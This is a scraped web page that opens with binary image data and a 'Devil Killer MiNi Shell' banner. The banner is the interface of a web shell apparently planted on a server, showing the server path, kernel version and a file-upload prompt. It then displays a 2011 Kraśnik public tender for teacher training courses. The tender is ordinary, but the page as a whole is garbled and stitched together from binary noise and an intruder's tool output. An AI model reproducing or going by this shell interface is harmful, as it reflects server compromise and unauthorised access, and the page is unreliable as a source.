JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110307/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20110307/74967-N-2011.html

<p class="kh_header"><b>Kraśnik: Zorganizowanie i przeprowadzenie kursów w ramach projektu Nowoczesny nauczyciel</b><br>
<b>Numer ogłoszenia: 74967 - 2011; data zamieszczenia: 07.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Kraśnika , ul. Lubelska 84, 23-200 Kraśnik, woj. lubelskie, tel. 081 8251540, faks 081 8252709.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.krasnik.um.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie kursów w ramach projektu Nowoczesny nauczyciel.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie w roku 2011 kursów 
w ramach projektu Nowoczesny nauczyciel współfinansowanego ze środków Europejskiego Funduszu Społecznego. Kursami zostaną objęci nauczyciele 
i pracownicy administracji placówek oświatowych Miasta Kraśnik. Celem kursów jest zdobycie kwalifikacji pożądanych na lokalnym rynku edukacyjnym, 
w następujących zakresach tematycznych, stanowiących odrębne zadania: 



Nr
Zadania	
TEMAT
(cel zadania)
	Adresaci	Liczba godzin 	Liczba uczestników	Uwagi
1.	KURS  NA ANIMATORA PRACY PROJEKTOWEJ W EDUKACJI
Celem kursu jest podniesienie kwalifikacji nauczycieli do prowadzenia zajęć techniką projektową z młodzieżą trudną oraz uzdolnioną.	Dyrektorzy 
i nauczyciele szkół 	240	10	jedna grupa
2.	KURS KWALIFIKACYJNY 
Z OLIGOFRENOPEDAGOGIKI
Celem kursu jest zdobycie uprawnień do pracy 
z dziećmi z obniżoną sprawnością intelektualną. 	Dyrektorzy 
i nauczyciele szkół	300	2x10	dwie grupy
3.	KURS  GRAFIKA KOMPUTEROWEGO
Celem kursu jest podniesienie poziomu wiedzy oraz nabycie umiejętności zastosowania w nauczaniu grafiki komputerowej.	
Dyrektorzy 
i nauczyciele szkół	240	10	jedna grupa
4.	KURS JĘZYKA ANGIELSKIEGO
Celem kursu jest zdobycie certyfikatu B2 
i  uprawnień do nauki języka angielskiego 
w przedszkolach i klasach I-III szkół podstawowych.	
Dyrektorzy 
i nauczyciele szkół	300	2x10	dwie grupy
5.	KURS JĘZYKA NIEMIECKIEGO
Celem kursu jest zdobycie certyfikatu B2 
i  uprawnień do nauki języka niemieckiego 
w przedszkolach i klasach I-III szkół podstawowych.	
Dyrektorzy 
i nauczyciele szkół	300	2x9	dwie grupy
6.	KURS Z ZAKRESU AUDYTU
Celem kursu jest zdobycie i ugruntowanie wiedzy 
z zakresu audytu.	Pracownicy administracji szkół	120	11	jedna grupa
7.	KURS Z ZAKRESU ZAMÓWIEŃ PUBLICZNYCH
Celem kursu jest zdobycie i ugruntowanie wiedzy 
z zakresu zamówień publicznych.	Pracownicy administracji szkół	120	11	

jedna grupa

2.	Program kursów:
1)	KURS ANIMATOR PRACY PROJEKTOWEJ W EDUKACJI:
	budowanie współpracy grupowej,
	tworzenie symulacji,
	kreowanie burzy mózgów,
	wykorzystanie zasobów internetowych jako bazy wiedzy,
	trening interpersonalny,
	uczniowie i ich dynamika,
	uczenie poprzez działania,
	kompetencje społeczne,
	badanie potrzeb szkoleniowych, planowanie i ewaluacja,
	wykorzystanie nowych technologii,
	negocjacje,
	analiza kompetencji,
	kreowanie wizerunku,
	praca indywidualna ze słuchaczem - trening,
	warsztaty pracy z uczniem zdolnym i trudnym
2)	KURS KWALIFIKACYJNY Z OLIGOFRENOPEDAGOGIKI:
	koncepcja edukacji osób z upośledzeniem umysłowym,
	wybrane zagadnienia z zakresu psychospołecznego funkcjonowania osób 
z niepełnosprawnością intelektualną w różnym wieku rozwojowym,
	psycho-stymulacyjna diagnoza i programowanie pracy rewalidacyjnej, podstawy pracy terapeutyczno-edukacyjnej z osobami z niepełnosprawnością intelektualną,
	diagnoza potrzeb edukacyjnych uczniów o obniżonej sprawności intelektualnej 
w różnym stopniu,
	metodyczne rozwiązania (metody i techniki) w zakresie edukacji dzieci i młodzieży z lekkim, umiarkowanym i znacznym stopniem niepełnosprawności intelektualnej,
	wczesna interwencja, edukacja specjalna w przedszkolu i szkole ogólnodostępnej,
	wybrane problemy: profilaktyki, stymulacji, korekcji i psychoterapii w działaniach wspomagających rozwój osób z niepełnosprawnością intelektualną (techniki relaksacyjne, muzyka, plastyka, zabawa, drama, kompensacja funkcji percepcyjno-motorycznych, mowy, profilaktyka uzależnień itp.),
	rozwijanie kompetencji pedagogicznych nauczycieli i ich umiejętności komunikacji interpersonalnej w kontekście optymalizacji działań rewalidacyjnych,
	rodzina i inne formy wspierania osób z niepełnosprawnością intelektualną 
w środowisku,
	zastosowanie zasady indywidualizacji w usprawnianiu psychospołecznym uczniów oraz wyborze metod i form pracy,
	organizacja procesu dydaktycznego w zespole, w którym znajdują się dzieci specjalnej troski,
	ocena osiągnięć szkolnych dziecka niepełnosprawnego,
	wykorzystanie aktywności własnej dziecka niepełnosprawnego.
3)	KURS  GRAFIKI KOMPUTEROWEJ:
	teoretyczne podstawy grafiki,
	wprowadzenie do programów graficznych,
	projekty graficzne,
	programowanie wirtualnej rzeczywistości z zastosowaniem języka VRML,
	programowanie stron WWW,
	programowanie w OpenGL,
	warsztaty praktyczne,
	prezentacje multimedialne na programie PowerPoint,
4)	KURS JĘZYKA ANGIELSKIEGO:
	zagadnienia gramatyczne, słownictwo, frazeologia i elementy słowotwórstwa,
	komunikacja,
	formy pisemne,
	rozumienie ze słuchu,
	czytanie ze zrozumieniem.
5)	KURS JĘZYKA NIEMIECKIEGO:
	zagadnienia gramatyczne, słownictwo, frazeologia i elementy słowotwórstwa,
	komunikacja,
	formy pisemne,
	rozumienie ze słuchu,
	czytanie ze zrozumieniem.
6)	KURS Z ZAKRESU AUDYTU:
	kontrola i audyt wewnętrzny według międzynarodowych standardów,
	księga procedur,
	audyt wewnętrzny a kontrola zewnętrzna,
	audyt wewnętrzny a kontrola finansowa,
	planowanie audytu wewnętrznego,
	planowanie audytu - ćwiczenia praktyczne,
	przestępstwa gospodarcze - mechanizmy,
	faza wstępna zadania audytowego,
	metodyka przeprowadzenia audytu wewnętrznego - studium przypadku.
7)	KURS Z ZAKRESU ZAMÓWIEŃ PUBLICZNYCH:
	zestawienie obowiązujących przepisów prawa związanych z funkcjonującym systemem zamówień publicznych - wprowadzenie do Prawa zamówień publicznych,
	pojęcia podstawowe,
	wyłączenia całkowite i częściowe ze stosowania ustawy,
	zasady udzielania zamówień publicznych,
	kwoty progowe w zamówieniach publicznych - zależność procedur od przedmiotu zamówienia i jego wartości,
	przygotowanie postępowania o udzielenie zamówienia publicznego (podstawa wszczęcia postępowania),
	opis przedmiotu zamówienia,
	szacowanie wartości przedmiotu zamówienia,
	zasady sporządzania Specyfikacji Istotnych Warunków Zamówienia,
	tryby udzielania zamówień publicznych,
	wybór oferty najkorzystniejszej,
	dokumentowanie postępowania o udzielenie zamówienia publicznego,
	procedura odwoławcza,
	umowy w zamówieniach publicznych i ich specyfika,
	kontrola zamówień publicznych,
	możliwe problemy interpretacyjne na prowadzone postępowania o udzielenie zamówienia.
3.	Miejsce przeprowadzenia kursów zapewnia Zamawiający. Szkolenia odbywać się będą 
w salach dydaktycznych Zespołu Placówek Oświatowych Nr 2 w Kraśniku.
4.	Kursy będą przeprowadzane w soboty i niedziele, zadania od nr 1 do nr 5 - 5 godz./dzień + przerwa kawowa i przerwa na obiad, zadania nr 6, nr 7 - 4 godz./dzień + przerwa kawowa i przerwa na obiad. 
5.	Wykonawca zobowiązany jest do opracowania szczegółowych programów szkolenia stosownie do poziomu prowadzonego kursu.
6.	W zadaniu nr 4 i nr 5 Wykonawca przeprowadzi wstępną ocenę poziomu słuchaczy - testy kwalifikacyjne.
7.	Wykonawca zobowiązany jest do przeprowadzenie egzaminów, sporządzenie protokołu 
z egzaminu i przekazanie kopii Zamawiającemu, wydania zaświadczeń o ukończeniu kursu (zgodnie z rozporządzeniem Ministra Edukacji i Nauki z dnia 03 lutego 2006 r. 
w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności 
i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r., Nr 31, poz. 216)).
8.	W przypadku zadania nr 2 nr 4 i nr 5 Wykonawca będzie posiadał uprawnienia do przeprowadzenia egzaminów i wydawania świadectw.
9.	Wykonawca zobowiązuje się do sprawdzania obecności uczestników kursu na każdych zajęciach - obecność na zajęciach uczestnicy potwierdzają własnoręcznym podpisem na liście obecności. 
10.	Faktury opłacane będą miesięcznie. Wykonawca dostarczy faktury do dziesiątego dnia każdego miesiąca.
11.	Wykonawca zobowiązany jest do prowadzenia dziennika lekcyjnego, który przedstawia na żądanie do wglądu przedstawicielowi Zamawiającego. Dziennik będzie stanowił podstawę do rozliczenia godzin szkolenia oraz kontroli frekwencji uczestników kursu.
12.	Zamawiający zastrzega sobie prawo kontrolowania przebiegu, sposobu prowadzenia oraz efektywności szkolenia i frekwencji uczestników, wglądu do prowadzonej dokumentacji. Zamawiający będzie mógł także uczestniczyć w ocenie końcowej uczestników kursu, która będzie prowadzona w formie egzaminu. 
13.	Wykonawca jest zobowiązany do przygotowania i nieodpłatnego udostępnienia materiałów dydaktycznych dla każdego uczestnika szkolenia lub kursu, zapewnienia urządzeń/pomocy dydaktycznych niezbędnych do realizacji szkolenia. Wykonawca zapewni uczestnikom materiały szkoleniowe w postaci podręczników, ćwiczeń i płyt. Wykonawca musi posiadać potencjał kadrowy i doświadczenie gwarantujące właściwą realizację zadania.
14.	Wykonawca nie może pobierać żadnych opłat od uczestników szkolenia.
15.	Wskazówki metodyczne do zadań nr 4 i nr 5: 
1)	Proces dydaktyczny powinien zapewnić słuchaczom wymierne efekty w postaci znajomości języka obcego w czterech obowiązujących sprawnościach - w zakresie czytania, pisania, mówienia, słuchu. 
2)	W trakcie kształcenia słuchaczy należy wykorzystywać pełną gamę dostępnych, właściwie dobranych, nowoczesnych materiałów i środków dydaktycznych. 
3)	Kształcenie słuchaczy powinno uwzględniać najnowsze osiągnięcia metodyki nauczania języków obcych. 
4)	Rozwijanie sprawności rozumienia ze słuchu powinno być realizowane poprzez słuchanie nagrań tekstów podręcznikowych, radiowych i telewizyjnych. Po ich wysłuchaniu należy przeprowadzać ćwiczenia sprawdzające prawidłowe zrozumienie 
i zapamiętywanie przekazanych informacji. 
5)	Rozwijanie sprawności mówienia powinno być realizowane w formie zajęć konwersacyjnych. Konwersacje należy przeprowadzać w oparciu o wcześniej poznane materiały audio-wizualne lub przeczytane teksty.
6)	Rozwijanie sprawności czytania należy realizować przez cały okres nauki korzystając z tekstów poszerzających leksykę, utrwalających zagadnienia gramatyczne oraz pozwalających rozwijać umiejętność wyszukiwania najważniejszych informacji 
w danym tekście. 
7)	Rozwijanie sprawności pisania realizować należy poprzez pisanie różnego rodzaju tekstów, ze szczególnym naciskiem na treść i formę..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.42.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku dotyczącego posiadania uprawnień do wykonania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania należy przedłożyć aktualne zaświadczenie o wpisie instytucji szkoleniowej do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący posiadania wiedzy i doświadczenia oceniony zostanie na podstawie wykazu usług (z podaniem ich wartości, przedmiotu, dat wykonania 
i odbiorców) wykonanych w ostatnich 3 latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia jest krótszy - w tym okresie (załącznik nr 4 do SIWZ). Warunek zostanie uznany za spełniony, jeżeli w tych latach Wykonawca wykonał lub wykonuje: 
	zadanie nr 1: 2 usługi szkolenia grup co najmniej 10 osobowych w zakresie pracy z trudną młodzieżą, 
	zadanie nr 2: 2 usługi szkolenia grup co najmniej 10 osobowych w zakresie oligofrenopedagogiki, 
	zadanie nr 3: 3 usługi szkolenia grup co najmniej 10 osobowych w zakresie grafiki komputerowej, 
	zadanie nr 4: 2 usługi szkolenia grup co najmniej 10 osobowych w zakresie nauki języka angielskiego, 
	zadanie nr 5: 2 usługi szkolenia grup co najmniej 10 osobowych w zakresie nauki języka niemieckiego, 
	zadanie nr 6: 2 usługi szkolenia grup co najmniej 10 osobowych w zakresie audytu, 
	zadanie nr 7: 2 usługi szkolenia grup co najmniej 10 osobowych 
w zakresie zamówień publicznych.
Należy załączyć dokumenty potwierdzające, że usługi te zostały wykonane lub są wykonywane należycie (referencje).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia oceniony zostanie na podstawie oświadczenia stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia oceniony zostanie na podstawie oświadczenia stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący sytuacji ekonomicznej i finansowej oceniony zostanie na podstawie oświadczenia stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia - w przypadku nie dysponowania takimi osobami przez Wykonawcę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku zmiany stawki podatku VAT zmianie ulega kwota wynagrodzenia netto, bez zmiany kwot brutto.
W przypadku uzyskania zgody od instytucji wdrażającej Zamawiający przedłuży termin realizacji przedmiotu zamówienia oraz usługa będzie dodatkowo wykonana w jednym tygodniu w trakcie wakacji (w dni powszednie).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.lublin.pl/miastokrasnik/index.php?id=85<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Kraśnik
ul. Lubelska 84
23-200 Kraśnik
pok. 321.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.03.2011 godzina 11:00, miejsce: Urząd Miasta Kraśnik
ul. Lubelska 84
23-200 Kraśnik
kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 14.04.2011.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Europejskiego Funduszu Społecznego 
w ramach Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs na animatora pracy projektowej w edukacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie w roku 2011 kursów w ramach projektu Nowoczesny nauczyciel współfinansowanego ze środków Europejskiego Funduszu Społecznego. Kursami zostaną objęci nauczyciele 
i pracownicy administracji placówek oświatowych Miasta Kraśnik. 
	
TEMAT
(cel zadania)
	Adresaci	Liczba godzin 	Liczba uczestników	Uwagi
1.	KURS  NA ANIMATORA PRACY PROJEKTOWEJ W EDUKACJI
Celem kursu jest podniesienie kwalifikacji nauczycieli do prowadzenia zajęć techniką projektową z młodzieżą trudną oraz uzdolnioną.	Dyrektorzy 
i nauczyciele szkół 	240	10	jedna grupa
	
Program kursów:
